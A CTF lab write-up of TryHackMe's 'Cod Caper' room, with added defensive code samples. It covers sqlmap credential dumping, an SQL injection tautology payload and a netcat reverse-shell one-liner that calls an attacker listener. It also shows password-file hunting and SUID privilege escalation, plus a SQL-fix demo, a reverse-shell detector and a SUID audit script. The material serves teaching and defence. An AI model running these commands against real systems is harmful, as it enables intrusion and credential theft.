The Cod Caper — TryHackMe — Write Up
Hello. I’m Rahmos. Here is my write-up for The Cod Caper on TryHackMe. Check it out!
First, deploy the machine and run nmap to find the open ports:
nmap -A -T4 -v <ip>
Port 80 (HTTP) is open, so browse to the website. It’s the default Apache page. Use gobuster to scan for hidden directories:
gobuster dir -u http://<ip> -w /path-to-wordlist
The hint told us to use big.txt, so let’s use that wordlist.
After the scan, we found /administrator.php.
It’s a login page. Now use sqlmap (as the room recommends) to test it for an SQL injection vulnerability:
sqlmap -u http://<ip>/administrator.php --forms --batch
*The --batch flag makes sqlmap take the default answer to every question it asks, so you won’t need to press “Y” for every single prompt!
The results show a database named users. So let’s run sqlmap again to dump all the data in users:
sqlmap -u http://<ip>/administrator.php --forms --batch -D users --dump
We’ve got the username and password of admin! Now log in using the credentials above.
It looks like the page lets us execute commands.
First, run ls to view the files.
So there are 3 files in this directory (/var/www/html).
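Why did sqlmap find anything at all? A login form is injectable when the handler pastes the submitted fields straight into the SQL text. The following is an added example, not code from the room or from this write-up: a constructed SQLite table standing in for the room’s users database (the real schema is not shown above), a lookup written the vulnerable way beside the hardened form, and the classic tautology input that every injection tutorial uses. The vulnerable version accepts it; the parameterized one compares it as a literal string and rejects it.

```python
import sqlite3

# Constructed demo database: the room's real schema is not in the write-up, only
# that sqlmap found a database called "users" holding an admin row.
def build_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-demo-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The pattern sqlmap's --forms scan looks for: user input concatenated into the
    SQL text, so the input can change the structure of the query itself."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: placeholders keep the input as data. The same payload is
    compared as an ordinary string and simply fails to match any row."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# Textbook tautology input; sqlmap sends variations of this automatically.
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    conn = build_demo_db()
    # The concatenated query becomes ... AND password = '' OR '1'='1', which is
    # always true, so the check passes without knowing the password.
    print("vulnerable, payload as password:", login_vulnerable(conn, "admin", TAUTOLOGY))  # True
    print("safe, same input:", login_safe(conn, "admin", TAUTOLOGY))  # False
    print("safe, real password:", login_safe(conn, "admin", "constructed-demo-password"))  # True
```

The fix is the only change between the two functions: the query text is constant and the driver binds the values. That is also what makes sqlmap’s --forms probing come back empty on a properly written login page.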
On your machine, use nc to start a listener on port 1234:
nc -lvnp 1234
Now execute this command to spawn a reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <host-ip> 1234 >/tmp/f
Now you’ve got the shell.
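From the blue-team side, the one-liner above is exactly the shape a process-execution monitor should alert on: a named pipe, an interactive shell with its stdio redirected, and a pipe into a network client, all launched by the web server account. The following is an added example, not from the room or this write-up: a small scorer run over constructed process-exec log lines (the key=value format and the 10.0.0.5 listener address are assumptions for the demo). A lone mkfifo from a legitimate service stays below the alert threshold; the reverse shell scores well above it.

```python
import re
from dataclasses import dataclass

# Constructed sample of process-execution events (not from the room). The simplified
# key=value format stands in for what an EDR or auditd forwarder would emit.
SAMPLE_LOG = """\
2024-05-01T10:02:11Z host=web01 user=www-data cmd="ls -la /var/www/html"
2024-05-01T10:02:30Z host=web01 user=www-data cmd="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 1234 >/tmp/f"
2024-05-01T10:03:02Z host=web01 user=pingu cmd="/tmp/LinEnum.sh -r report -e /tmp"
2024-05-01T10:04:44Z host=web01 user=root cmd="mkfifo /run/app/worker.pipe"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')

# Each indicator: (name, regex on the command line, weight). Weights add up, so a
# lone mkfifo (ordinary IPC) does not alert, while mkfifo feeding an interactive
# shell and a network client does.
INDICATORS = [
    ("named pipe created", re.compile(r"\bmkfifo\b"), 1),
    ("interactive shell with stdio redirected", re.compile(r"/bin/(?:ba)?sh\s+-i\b.*2>&1"), 3),
    ("netcat with host and port", re.compile(r"\bnc(?:at)?\b\s+\S+\s+\d{1,5}\b"), 3),
    ("pipe feeding a network client", re.compile(r"\|\s*nc(?:at)?\b"), 2),
]
WEB_ACCOUNTS = {"www-data", "apache", "nginx", "http"}
ALERT_THRESHOLD = 5


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    score: int
    reasons: list


def score_command(user: str, cmd: str) -> tuple:
    """Return (score, reasons) for one command line."""
    score, reasons = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(name)
    # A web service account spawning a shell is suspicious on its own: the write-up's
    # foothold comes from exactly that path (command execution through the web app).
    if user in WEB_ACCOUNTS and re.search(r"/bin/(?:ba)?sh\b", cmd):
        score += 2
        reasons.append("web service account spawning a shell")
    return score, reasons


def detect_reverse_shells(log_text: str, threshold: int = ALERT_THRESHOLD) -> list:
    """Parse each log line and return a Finding for every command at or above threshold."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than guess at fields
        score, reasons = score_command(m["user"], m["cmd"])
        if score >= threshold:
            findings.append(Finding(m["ts"], m["host"], m["user"], score, reasons))
    return findings


if __name__ == "__main__":
    for f in detect_reverse_shells(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.user} score={f.score}: {', '.join(f.reasons)}")
```

On the constructed log only the www-data line alerts (all four indicators plus the web-account rule, score 11); root’s mkfifo for an application pipe scores 1 and is ignored. Tune the weights and the threshold against your own baseline before trusting it in production.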
Run cat /etc/passwd to find the other user.
Well, he’s papa.
Then use find to search for the SSH password:
find / -name pass -type f 2>/dev/null
Now download the LinEnum.sh script and copy it to the SSH machine using scp.
You can download the script here:
Now scp it over:
scp LinEnum.sh pingu@<ip>:/tmp
Enter the SSH password found above, then cd /tmp and execute the script:
./LinEnum.sh -r report -e /tmp
You will find some interesting SUID files:
After that, run pwndbg as the room instructs and get root! Then you can read the contents of the root.txt file.
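The reason LinEnum calls those SUID files “interesting” is that a setuid-root program runs with root’s privileges no matter who launches it, so any flaw in a home-grown one is a straight road to uid 0 (the room’s final pwndbg step is that road). The defender’s counterpart is a periodic audit: list every setuid file and diff it against the set a clean image is expected to have. The following is an added example, not from the room or this write-up. The baseline set and the sample scan entries are constructed for the demo (build a real baseline from a known-good host, and note that the path /opt/app/helper is a placeholder, not the room’s binary).

```python
import os
import stat
from typing import Iterable

# Constructed baseline of setuid binaries a stock Debian/Ubuntu host ships with.
# For real use, generate this from a known-good image rather than from memory.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/lib/openssh/ssh-keysign",
}


def is_setuid(mode: int) -> bool:
    """True for a regular file whose setuid bit is set (the leading 4 in 4755)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def scan_suid(root: str = "/") -> list:
    """Walk the filesystem and return (path, mode, owner uid) for every setuid file.
    lstat is used so a symlink is reported by its own mode, not its target's."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Skip pseudo-filesystems: noisy, and they hold no real executables.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished file: skip it, do not guess
            if is_setuid(st.st_mode):
                found.append((path, st.st_mode, st.st_uid))
    return found


def unexpected_suid(entries: Iterable, baseline: set = EXPECTED_SUID) -> list:
    """Return setuid paths absent from the baseline, root-owned ones first, since a
    flaw in a root-owned setuid binary hands out uid 0 directly."""
    unexpected = [(path, uid) for path, mode, uid in entries
                  if is_setuid(mode) and path not in baseline]
    unexpected.sort(key=lambda e: (e[1] != 0, e[0]))
    return [path for path, _ in unexpected]


# Constructed sample of scan output (not taken from the room): two stock binaries, a
# root-owned setuid file no package installs, a user-owned one, and a normal binary.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),
    ("/usr/bin/sudo", 0o104755, 0),
    ("/opt/app/helper", 0o104755, 0),        # placeholder path, not the room's binary
    ("/home/pingu/tool", 0o104755, 1000),    # constructed uid for a normal user
    ("/usr/bin/python3", 0o100755, 0),       # executable but not setuid
]

if __name__ == "__main__":
    # Swap SAMPLE_ENTRIES for scan_suid() to audit the host you are running on.
    for path in unexpected_suid(SAMPLE_ENTRIES):
        print("unexpected setuid file:", path)
```

Anything this reports that is not explained by a package you installed deserves the same scrutiny LinEnum invites: who owns it, what it does, and whether the setuid bit can simply be removed.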